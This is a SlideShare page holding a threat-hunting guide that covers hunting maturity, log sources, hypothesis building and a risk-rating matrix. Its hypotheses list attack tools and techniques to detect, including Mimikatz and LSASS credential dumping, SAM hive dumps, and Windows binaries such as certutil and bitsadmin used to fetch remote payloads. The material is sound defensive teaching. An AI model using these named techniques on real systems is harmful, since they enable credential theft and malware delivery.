SlideShare une entreprise Scribd logo

Threat Hunting Procedures and Measurement Matrice

Vishal Kumar
Vishal Kumar

This document will provide the basics of Cyber Threat Hunting and answers of some Q such as; What is Threat Hunting?, What is the Importance of Threat Hunting, and How it can be start....Bla..Bla..Bla...

Technologie
1  sur  11
Télécharger pour lire hors ligne
1 | P a g e Table of Content CONTENTS INTRO TO HUNTING............................................................................................................................ 02 THREAT HUNTING MATURITY MODEL................................................................................................. 02 BASIC REQUIREMENT FOR THREAT HUNTING...................................................................................... 03 THE PYRAMID OF PAIN ....................................................................................................................... 04 IMPORTANCE OF THREAT INTELLIGENCE IN THREAT HUNTING ............................................................ 04 PROCESS TO CONDUCT THREAT HUNTING........................................................................................... 05 RISK RATING MEASUREMENT MATRIX ................................................................................................ 11
2 | P a g e Figure 1: A Successful Threat-hunting technique Threat Hunting Procedures 1. Intro to Hunting – What it is, Why It’s Important, Hunting is a proactive, hypothesis-based investigation process of cyber-attacks. Threat hunting is the human-driven, proactive and iterative search through networks, endpoints, or datasets to detect malicious, suspicious, or risky activities that have evaded detection by existing automated tools. Threat hunting has been around for a while, but it has only recently become a focus of modern enterprise Security Operation Centres (SOCs). Hunting can revolutionize the threat detection efforts of an organization, The purpose of hunting is specifically to find what is escaped by the automated alerting and monitoring systems. Hunting is searching for anomalies by patrolling through data, rather than investigating a call in from SIEM. It is also important to keep in mind that successful hunting is tied to capabilities in three different areas: 2. Threat Hunting Maturity Model As mentioned, there are many kinds of techniques and practices that an analyst can pursue in hunting. Hunting maturity is a measure of what kinds of techniques and data analyst can work with. To help assess the current hunting capabilities and determine how analyst should be aiming to grow them, below is the reference of the Hunting Maturity Model (HMM). (the Hunting Maturity Model is just a prescriptive model, and many organizations will sometimes be at varying levels of capabilities: excelling at some criteria and less advanced in others)
3 | P a g e Figure 2: Threat-hunting maturity model The Hunting Maturity Model describes five levels of an organization’s proactive detection capability. Each level of maturity corresponds to how effectively an organization can hunt based on the data they collect, their ability to follow and create data analysis procedures (DAP), and their level of hunting automation. The HMM can be used by analysts and managers to measure current maturity and provide a roadmap for improvement. Often these improvements focus on a combination of tools, processes, and personnel. 3. Basic Requirement for Threat Hunting Analytical Mindset: This is, without question, the most important skill an analyst can possess. Without the innate curiosity in and pursuit of the “huh … that’s weird,” an analyst can have all the data in the world, but they will inevitably find themselves missing pieces of the puzzle. The analyst needs to be able to make reasoned assumptions and chart a new course when the trail runs cold. Log Analysis: Logs from services and devices are just a couple of the most important and underutilized sources of intelligence for any security department. The ability to analyze logs for anomalies and pivot between data sources to see the big picture is a key competency. Network Forensics: The ability to read and understand packet capture data and determine the malicious nature of network traffic. If you’re fortunate enough to extend your NSM capabilities to the endpoint with an EDR product, a sound foundation in host-based forensics is key to compliment your network knowledge. Network Architecture: An understanding of different network devices and how they operate within the environment. Attacker Lifecycle: Understanding the different events that happen at any given stage in an attack lifecycle will better prepare your analysts to compartmentalize and prioritize their findings and activities.
4 | P a g e Figure 3: Pyramid of Pain – Threat-hunting Tools: This is an incredibly broad area, but at a foundational level, an understanding of how log aggregators ingest data as well as the function of packet capture analysis tools are essential for the analyst to understand. OS Architecture: Different operating systems represent different attack vectors. A strong grasp of Windows- and Linux-based operating systems is essential. Attack Methods: Exploit Kits, Malware, Phishing, and software misconfigurations. Understanding how an attacker attempts to penetrate your network is key to hunting for indicators of the behavior. 4. The Pyramid of Pain The Pyramid of Pain is the simple diagram shows the relationship between the types of indicators that analyst might use to detect an adversary’s activities and how much pain it will cause to analyst to detect the indicators of an incident/attack. 5. Importance of Threat Intelligence in Threat Hunting Threat Intelligence or Cyber Threat Intelligence (CTI) is a part of cybersecurity that focuses on the analysis and collection of information on both potential and current cyber-attacks that threaten the security of an organization or its assets. Cyber Threat Intelligence is a proactive security measure that prevents data or security breaches and saves the financial cost required to clean up such a mess after a breach.
5 | P a g e CTI’s main objective is to provide companies an in-depth understanding about the cyber-threats that poses the greatest risks to their infrastructure and how to protect their business in the long run Cyber threat intelligence gathers raw information about new and existing threat actors from many different sources. CTI teams then analyze the collected data to produce appropriate threat intelligence management and feeds reports full of only the most important information that can be utilized by automated security control solutions and management to make security decisions for the company. The fundamental purpose of this kind of security is that it helps to keep companies informed of the advanced threats and exploits. 6. Process to Conduct Threat Hunting Threat hunting process starts with collecting the logs of all the sources such as security solution, database, servers, application logs etc. the best and easy method to collect the logs is to use the log management device such as SIEM. After the collecting the logs and normalizing the logs the next step is to develop the hypothesis and apply on the output of data to start the hunting. I. Gathering Data: Collect, Normalize, Analyse The following are some of the types of logs that may be important to collect in the organization environment: • Configuration Management Database (CMDB) • Application/service logs • DHCP • Proxy • Web and Application Server • Active Directory/LDAP • Domain Name Service (DNS) • Application Firewall • Database Application and Transaction • Host-based logs • Host/Network IDS/IPS • Firewall • Antivirus • Host-based logs • Operating System (e.g., Windows Event and UNIX Syslog) • Endpoint Detection Response (EDR) • Virtual Machine Hypervisor • Network infrastructure logs • VPN • Router • Firewall • Load Balancer The below graphic is defining the data collection framework which is designed to help organizations focus on discovering and qualifying the security incidents and attack.
6 | P a g e Figure 4: Data Collection Framework II. Development of Hypothesis for Threat-hunting After collecting, normalizing and analyzing the data, then next step is to development the hypothesis and apply it on the output of data to start hunting. Below is the list of sources which helps to develops the advance threat hunting hypothesis: Internal Sources: internal sources are those data which generates in the boundary of an organisation such as past incidents, SIEM alerts, VA/PT reports etc. these data sources are very important and helpful for threat hunter to build the hypothesis. The hypothesis which are built on the internal data sources are very much effective and realistic. Below are some examples of internal sources: • Past incidents • Reconnaissance attempts against your infrastructure • Threats to specific line of business and industry verticals • Threats to customers’ intellectual property • VA/PT reports External Sources: the external sources for development of hypothesis are those data which are generates outside of the boundary of an organisation or data publish by the other vendors such as Threat intel feeds, TTP’s of an attack, OSINT, threat advisories, govt. advisories, etc. The hypothesis which are builds on the external sources are proactive hypothesis which are one step ahead then the monitoring system. Below are some examples of external sources:
7 | P a g e Figure 5: MITRE ATT&CK Refresher MIRTE ATT&CK Recent Developments: https://attack.mitre.org/resources/updates/ • Paid intelligence feeds • Open Source Intelligence (OSINT) • Partnerships with government agencies • Security Advisories • TTP of an attack • Cyber Kill Chain III. List of Threat-hunting Hypothesis Below is the list of some basic threat hunting hypothesis: 1. Proxy Logs Traffic Analysis Hypothesis I. Hypothesis: Bytes uploaded stats/Data upload Hunt For: Session uploaded data > 1 MB Possible Threat: Data exfiltration Format: Number of bytes, client IP, server IP, server port II. Hypothesis: Bytes downloaded stats/file download Hunt For: Session downloaded data > 3 MB Possible Threat: Attacker downloading attack tools Format: Number of bytes, client IP, server IP, server port III. Hypothesis: HTTP host header/traffic on malicious domain/URL categories Hunt For: Hosts not ending with .com | .net | .org & host length > 30 char Possible Threat: DGA, suspicious domains (i.e. http://bit.ly/2jKNAhi or HTTP traffic to an IP address instead of FQDN) Format: Traffic Count, HTTP host, URL Categories
8 | P a g e IV. Hypothesis: HTTP referrer header Hunt For: Malicious referring domains Possible Threat: Watering hole and JS exploit kits Format: Count, HTTP referrer, HTTP status code (302) V. Hypothesis: HTTP user-agent header Hunt For: Uncommon or non-existing User-Agents Possible Threat: Malicious traffic Format: Count, HTTP user-agent, HTTP status code VI. Hypothesis: HTTP request methods/Suspicious HTTP request Hunt For: Methods other than GET/POST Possible Threat: Uploads (PUT method), tunnelling (CONNECT method) and injection Format: traffic count, HTTP method VII. Hypothesis: HTTP number of requests/beaconing on suspicious domains Hunt For: Clients sending increasing number of HTTP requests Possible Threat: Beacons, tunnelling, and data exfiltration Format: Count of traffic, client IP, server IP, Domain name, HTTP status code 2. Firewall Traffic Analysis Hypothesis I. Hypothesis: SSH sessions Hunt For: Unexpected connections Possible Threat: Recon and lateral movements Format: Count of traffic, client IP, server IP, server port II. Hypothesis: RDP sessions/Unauthorized Remote desktop connection Hunt For: Unexpected RDP clients/servers Possible Threat: Lateral movements Format: Count of traffic, client IP, server IP, server port III. Hypothesis: IRC sessions/Suspicious malware communication Hunt For: IRC clients Possible Threat: C&C traffic and potential insider Format: Count of traffic, client IP, server IP, server port IV. Hypothesis: FTP sessions/Data exfiltration Hunt For: Unexpected FTP clients/server Possible Threat: Lateral movements or data exfiltration
9 | P a g e Format: Count of traffic, Client IP, Server IP, Server port V. Hypothesis: TCP listening ports on private IPs/Inbound Traffic on critical ports Hunt For: Unauthorized service Possible Threat: Backdoors Format: Count of sessions, TCP port, server IP, protocol VI. Hypothesis: TCP listening ports on public IPs/outbound connection on suspicious IP Hunt For: Abnormal port / protocol combination (i.e. non-HTTP carried over port 80) Possible Threat: Unauthorized communication channel Format: Count of sessions, TCP port, protocol 3. Antivirus Traffic Analysis Hypothesis I. Hypothesis: Continues Malware infection on system Hunt For: Recurring/Malware reinfection Possible Threat: Format: Virus name, infected file, File Hash value, count of infection II. Hypothesis: Uncleaned malware infection Hunt For: Uncleaned malware Possible Threat: New Malware/ransomware without signature Format: Action Taken, Virus name, infected file, File Hash value, count of infection 4. Windows logs Analysis Hypothesis I. Hypothesis: Details Tracking events/Process Creation Hunt For: suspicious Process Created by Attacker/malware Possible Threat: APT threat, New Malware Format: Event ID 4688, 4689, New process name, Creator Process Name, Logon ID, Account Name II. Hypothesis: User added to privilege group Hunt For: ATP Expansion/Privilege escalation Possible Threat: APT Attack/ Format: event id 4732, 4728, 4756, 4746, 4751, 4761, Account name, Logon ID, III. Hypothesis: Detection of Mimikatz Hunt For: Credential dumps Possible Threat: APT Attack/ Format: event ID 4688, 4689, event data image: lsass.exe, Mimikatz.exe.
10 | P a g e 5. Other Hunting Hypothesis • Hunt for File-less Malware • Hunt for Malware • Hunt for Lateral Movements • Hunt for Windows Event IDs • Hunt for group policy violations • Hunt for Network Beaconing • Hunt for Insider Privilege Escalation • Hunt for Privilege failures • Hunt for PowerShell Errors • Hunt for PowerShell Traces • Hunt for Login Failures on Critical Servers • Hunt for vulnerabilities • Hunt for Persistence Threats • Hunt for Registry violations • Hunt for Network traffic denied by firewalls or IPs • Hunt for Unusual DNS requests - either to malicious domains or internal flaws • Hunt for Signs of DDoS activity and geographic irregularities • Hunt for Mismatched port-application traffic • Hunt for Unusual north-south or east-west network traffic • Hunt for Anomalies • Hunt for Unknown Network Shares • Hunt for Network Recon tools • Hunt for brute force RDP attempts • Hunt for Suspicious File Types • Hunt for Windows Admin Shares • Hunt for RDP. PSEXEC, Task created, Task scheduled, WMI, Services created • Hunt for Parent/Child relationships - Process • Hunt for Parent/Child relationships - MS Office • Hunt for Parent/Child relationships - Cmd • Hunt for Parent/Child relationships - PowerShell • Hunt for Parent/Child relationships - Memory • Hunt for Process Injection • Hunt for Windows onelinersto download remote payload - below ref: • Possible tools: powershell.exe, wmic.exe, regsvr32, rundll32.exe, mshta.exe, regasm.exe, regsvc.exe, odbcconf.exe, msbuild.exe, certutil.exe, bitsadmin.exe • Hunt for Masquerading • Hunt for Privilege Escalation - Access token manipulation • Hunt for Privilege Escalation - Weak service permissions • Hunt for UAC Bypass • Hunt for Credential Dumping • Hunt for Credentials Dumping - Dump SAM/SECURITY registry hives • Hunt for Credentials Dumping - Shadow Copies • Hunt for Mimikatz cmds / Hunting DCShadow • Hunt for Credentials Dumping - LSASS memory access
11 | P a g e • Hunt for Suspicious Services. Services that run executables from %systemroot%. • Hunt for Suspicious Services. Services that run PowerShell • Hunt for Beaconing • Hunt for BOT Activity • Hunt for Malicious Domains & DNS Tunneling 7. Risk Rating Measurement Matrix This rating is reserved for threats that will result in an impact to the organization. HIGH A threat is categorized as HIGH if: • it involves critical organization assets • attempts to evade standard signature-based detections • exfiltrates data outside the organization • attempts to create a communication link with external Command & Control • it results in direct reputational or financial loss for the organization MEDIUM A threat is categorized as MEDIUM if: • it involves limited infections at endpoints • malwares on system which cannot be cleaned/deleted/quarantined • attempts to connect externally which get blocked • access to suspicious domains or IP addresses LOW A threat is categorized as LOW if: • if it involves attempts of attacks from external sources • threats related security misconfiguration in systems • access to non-standard or non-business domains or IP addresses • involves installation of unnecessary applications (not necessarily malicious) Prepared By: -Vishal Kumar Threat Analyst

Recommandé

Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down Intruders
Infosec
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
Ben Boyd
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
Splunk
 
Threat hunting for Beginners
Threat hunting for BeginnersThreat hunting for Beginners
Threat hunting for Beginners
SKMohamedKasim
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
Splunk
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
Dhruv Majumdar
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
Morane Decriem
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda Security
Panda Security
 

Recommandé

Cyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down IntrudersCyber Threat Hunting: Identify and Hunt Down Intruders
Cyber Threat Hunting: Identify and Hunt Down Intruders
Infosec
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
Ben Boyd
 
Threat Hunting
Threat HuntingThreat Hunting
Threat Hunting
Splunk
 
Threat hunting for Beginners
Threat hunting for BeginnersThreat hunting for Beginners
Threat hunting for Beginners
SKMohamedKasim
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
Splunk
 
Bsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat HuntingBsides 2019 - Intelligent Threat Hunting
Bsides 2019 - Intelligent Threat Hunting
Dhruv Majumdar
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
Morane Decriem
 
What is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda SecurityWhat is Threat Hunting? - Panda Security
What is Threat Hunting? - Panda Security
Panda Security
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep Singh
OWASP Delhi
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
Teymur Kheirkhabarov
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
Splunk
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
Dhruv Majumdar
 
Splunk Threat Hunting Workshop
Splunk Threat Hunting WorkshopSplunk Threat Hunting Workshop
Splunk Threat Hunting Workshop
Splunk
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
Digit Oktavianto
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
GIBIN JOHN
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with Phirelight
Hostway|HOSTING
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
Christopher Gerritz
 
Cyber Threat hunting workshop
Cyber Threat hunting workshopCyber Threat hunting workshop
Cyber Threat hunting workshop
Arpan Raval
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query Language
Ross Wolf
 
Splunk workshop-Threat Hunting
Splunk workshop-Threat HuntingSplunk workshop-Threat Hunting
Splunk workshop-Threat Hunting
Splunk
 
6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat Intelligence6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat Intelligence
Sirius
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber world
Akash Sarode
 
Threat Intelligence 101 - Steve Lodin - Submitted
Threat Intelligence 101 - Steve Lodin - SubmittedThreat Intelligence 101 - Steve Lodin - Submitted
Threat Intelligence 101 - Steve Lodin - Submitted
Steve Lodin
 
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghCyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
OWASP Delhi
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
Splunk
 
SIEM and Threat Hunting
SIEM and Threat HuntingSIEM and Threat Hunting
SIEM and Threat Hunting
n|u - The Open Security Community
 
Threat hunting foundations: People, process and technology.pptx
Threat hunting foundations: People, process and technology.pptxThreat hunting foundations: People, process and technology.pptx
Threat hunting foundations: People, process and technology.pptx
Infosec
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
Teymur Kheirkhabarov
 
Understanding Cyber Threat Intelligence A Guide for Analysts.pdf
Understanding Cyber Threat Intelligence A Guide for Analysts.pdfUnderstanding Cyber Threat Intelligence A Guide for Analysts.pdf
Understanding Cyber Threat Intelligence A Guide for Analysts.pdf
uzair
 
Aujas incident management webinar deck 08162016
Aujas incident management webinar deck 08162016Aujas incident management webinar deck 08162016
Aujas incident management webinar deck 08162016
Karl Kispert
 

Contenu connexe

Tendances

The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query Language
Ross Wolf
 
6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat Intelligence6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat Intelligence
Sirius
 
Threat Intelligence 101 - Steve Lodin - Submitted
Threat Intelligence 101 - Steve Lodin - SubmittedThreat Intelligence 101 - Steve Lodin - Submitted
Threat Intelligence 101 - Steve Lodin - Submitted
Steve Lodin
 
Threat hunting foundations: People, process and technology.pptx
Threat hunting foundations: People, process and technology.pptxThreat hunting foundations: People, process and technology.pptx
Threat hunting foundations: People, process and technology.pptx
Infosec
 

Tendances (20)

Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep Singh
 
PHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On LabPHDays 2018 Threat Hunting Hands-On Lab
PHDays 2018 Threat Hunting Hands-On Lab
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 
Effective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat IntelligenceEffective Threat Hunting with Tactical Threat Intelligence
Effective Threat Hunting with Tactical Threat Intelligence
 
Splunk Threat Hunting Workshop
Splunk Threat Hunting WorkshopSplunk Threat Hunting Workshop
Splunk Threat Hunting Workshop
 
Cyber Threat Hunting Workshop
Cyber Threat Hunting WorkshopCyber Threat Hunting Workshop
Cyber Threat Hunting Workshop
 
Windows Threat Hunting
Windows Threat HuntingWindows Threat Hunting
Windows Threat Hunting
 
Cyber Threat Hunting with Phirelight
Cyber Threat Hunting with PhirelightCyber Threat Hunting with Phirelight
Cyber Threat Hunting with Phirelight
 
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - GerritzBSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
BSidesLV 2016 - Powershell - Hunting on the Endpoint - Gerritz
 
Cyber Threat hunting workshop
Cyber Threat hunting workshopCyber Threat hunting workshop
Cyber Threat hunting workshop
 
The Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query LanguageThe Hunter Games: How to Find the Adversary with Event Query Language
The Hunter Games: How to Find the Adversary with Event Query Language
 
Splunk workshop-Threat Hunting
Splunk workshop-Threat HuntingSplunk workshop-Threat Hunting
Splunk workshop-Threat Hunting
 
6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat Intelligence6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat Intelligence
 
Threat hunting in cyber world
Threat hunting in cyber worldThreat hunting in cyber world
Threat hunting in cyber world
 
Threat Intelligence 101 - Steve Lodin - Submitted
Threat Intelligence 101 - Steve Lodin - SubmittedThreat Intelligence 101 - Steve Lodin - Submitted
Threat Intelligence 101 - Steve Lodin - Submitted
 
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep SinghCyber threat Intelligence and Incident Response by:-Sandeep Singh
Cyber threat Intelligence and Incident Response by:-Sandeep Singh
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
SIEM and Threat Hunting
SIEM and Threat HuntingSIEM and Threat Hunting
SIEM and Threat Hunting
 
Threat hunting foundations: People, process and technology.pptx
Threat hunting foundations: People, process and technology.pptxThreat hunting foundations: People, process and technology.pptx
Threat hunting foundations: People, process and technology.pptx
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
 

Similaire à Threat Hunting Procedures and Measurement Matrice

Understanding Cyber Threat Intelligence A Guide for Analysts.pdf
Understanding Cyber Threat Intelligence A Guide for Analysts.pdfUnderstanding Cyber Threat Intelligence A Guide for Analysts.pdf
Understanding Cyber Threat Intelligence A Guide for Analysts.pdf
uzair
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdf
ssuser4237d4
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdf
ssuser4237d4
 
Cyber-Espionage: Understanding the Advanced Threat Landscape
Cyber-Espionage: Understanding the Advanced Threat LandscapeCyber-Espionage: Understanding the Advanced Threat Landscape
Cyber-Espionage: Understanding the Advanced Threat Landscape
Aaron White
 
RISK MITIGATION AND THREAT IDENTIFICATIONIntroductionInforma.docx
RISK MITIGATION AND THREAT IDENTIFICATIONIntroductionInforma.docxRISK MITIGATION AND THREAT IDENTIFICATIONIntroductionInforma.docx
RISK MITIGATION AND THREAT IDENTIFICATIONIntroductionInforma.docx
joellemurphey
 
How To Turbo-Charge Incident Response With Threat Intelligence
How To Turbo-Charge Incident Response With Threat IntelligenceHow To Turbo-Charge Incident Response With Threat Intelligence
How To Turbo-Charge Incident Response With Threat Intelligence
Resilient Systems
 
Webinar: Get Ready to Detect, Respond & Recover from a Cyber Attack
Webinar: Get Ready to Detect, Respond & Recover from a Cyber AttackWebinar: Get Ready to Detect, Respond & Recover from a Cyber Attack
Webinar: Get Ready to Detect, Respond & Recover from a Cyber Attack
Aujas
 
vmware-best-practices-healthcare-it-security-whitepaper
vmware-best-practices-healthcare-it-security-whitepapervmware-best-practices-healthcare-it-security-whitepaper
vmware-best-practices-healthcare-it-security-whitepaper
Tony Amaddio
 

Similaire à Threat Hunting Procedures and Measurement Matrice (20)

Understanding Cyber Threat Intelligence A Guide for Analysts.pdf
Understanding Cyber Threat Intelligence A Guide for Analysts.pdfUnderstanding Cyber Threat Intelligence A Guide for Analysts.pdf
Understanding Cyber Threat Intelligence A Guide for Analysts.pdf
 
Aujas incident management webinar deck 08162016
Aujas incident management webinar deck 08162016Aujas incident management webinar deck 08162016
Aujas incident management webinar deck 08162016
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdf
 
Cyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdfCyber Threat Hunting Workshop.pdf
Cyber Threat Hunting Workshop.pdf
 
Target Breach Analysis
Target Breach AnalysisTarget Breach Analysis
Target Breach Analysis
 
Hacking appliances
Hacking appliancesHacking appliances
Hacking appliances
 
Cybersecurity: A Manufacturers Guide by Clearnetwork
Cybersecurity: A Manufacturers Guide by ClearnetworkCybersecurity: A Manufacturers Guide by Clearnetwork
Cybersecurity: A Manufacturers Guide by Clearnetwork
 
It risk assessment
It risk assessmentIt risk assessment
It risk assessment
 
Cyber-Espionage: Understanding the Advanced Threat Landscape
Cyber-Espionage: Understanding the Advanced Threat LandscapeCyber-Espionage: Understanding the Advanced Threat Landscape
Cyber-Espionage: Understanding the Advanced Threat Landscape
 
The Significance of IT Security Management & Risk Assessment
The Significance of IT Security Management & Risk AssessmentThe Significance of IT Security Management & Risk Assessment
The Significance of IT Security Management & Risk Assessment
 
Ctia course outline
Ctia course outlineCtia course outline
Ctia course outline
 
RISK MITIGATION AND THREAT IDENTIFICATIONIntroductionInforma.docx
RISK MITIGATION AND THREAT IDENTIFICATIONIntroductionInforma.docxRISK MITIGATION AND THREAT IDENTIFICATIONIntroductionInforma.docx
RISK MITIGATION AND THREAT IDENTIFICATIONIntroductionInforma.docx
 
How To Turbo-Charge Incident Response With Threat Intelligence
How To Turbo-Charge Incident Response With Threat IntelligenceHow To Turbo-Charge Incident Response With Threat Intelligence
How To Turbo-Charge Incident Response With Threat Intelligence
 
The Security and Compliance Plan for Maxistar Medical Supplies Company
The Security and Compliance Plan for Maxistar Medical Supplies Company The Security and Compliance Plan for Maxistar Medical Supplies Company
The Security and Compliance Plan for Maxistar Medical Supplies Company
 
Strategy considerations for building a security operations center
Strategy considerations for building a security operations centerStrategy considerations for building a security operations center
Strategy considerations for building a security operations center
 
Threat intelligence minority report
Threat intelligence minority reportThreat intelligence minority report
Threat intelligence minority report
 
What Is Cyber Threat Intelligence | How It Work? | SOCVault
What Is Cyber Threat Intelligence | How It Work? | SOCVaultWhat Is Cyber Threat Intelligence | How It Work? | SOCVault
What Is Cyber Threat Intelligence | How It Work? | SOCVault
 
Road map for actionable threat intelligence
Road map for actionable threat intelligenceRoad map for actionable threat intelligence
Road map for actionable threat intelligence
 
Webinar: Get Ready to Detect, Respond & Recover from a Cyber Attack
Webinar: Get Ready to Detect, Respond & Recover from a Cyber AttackWebinar: Get Ready to Detect, Respond & Recover from a Cyber Attack
Webinar: Get Ready to Detect, Respond & Recover from a Cyber Attack
 
vmware-best-practices-healthcare-it-security-whitepaper
vmware-best-practices-healthcare-it-security-whitepapervmware-best-practices-healthcare-it-security-whitepaper
vmware-best-practices-healthcare-it-security-whitepaper
 

Plus de Vishal Kumar

Plus de Vishal Kumar (20)

The Complete Questionnaires About Firewall
The Complete Questionnaires About FirewallThe Complete Questionnaires About Firewall
The Complete Questionnaires About Firewall
 
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)E-mail Security Protocol - 2 Pretty Good Privacy (PGP)
E-mail Security Protocol - 2 Pretty Good Privacy (PGP)
 
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) Protocol
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) ProtocolE-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) Protocol
E-Mail Security Protocol - 1 Privacy Enhanced Mail (PEM) Protocol
 
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using MetasploitPrivileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
Privileges Escalation by Exploiting Client-Side Vulnerabilities Using Metasploit
 
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionExploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
 
Auditing System Password Using L0phtcrack
Auditing System Password Using L0phtcrackAuditing System Password Using L0phtcrack
Auditing System Password Using L0phtcrack
 
Dumping and Cracking SAM Hashes to Extract Plaintext Passwords
Dumping and Cracking SAM Hashes to Extract Plaintext PasswordsDumping and Cracking SAM Hashes to Extract Plaintext Passwords
Dumping and Cracking SAM Hashes to Extract Plaintext Passwords
 
Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2 Fundamental of Secure Socket Layer (SSL) | Part - 2
Fundamental of Secure Socket Layer (SSL) | Part - 2
 
The Fundamental of Electronic Mail (E-mail)
The Fundamental of Electronic Mail (E-mail)The Fundamental of Electronic Mail (E-mail)
The Fundamental of Electronic Mail (E-mail)
 
Fundamental of Secure Socket Layer (SSl) | Part - 1
Fundamental of Secure Socket Layer (SSl) | Part - 1Fundamental of Secure Socket Layer (SSl) | Part - 1
Fundamental of Secure Socket Layer (SSl) | Part - 1
 
The Fundamental of Secure Socket Layer (SSL)
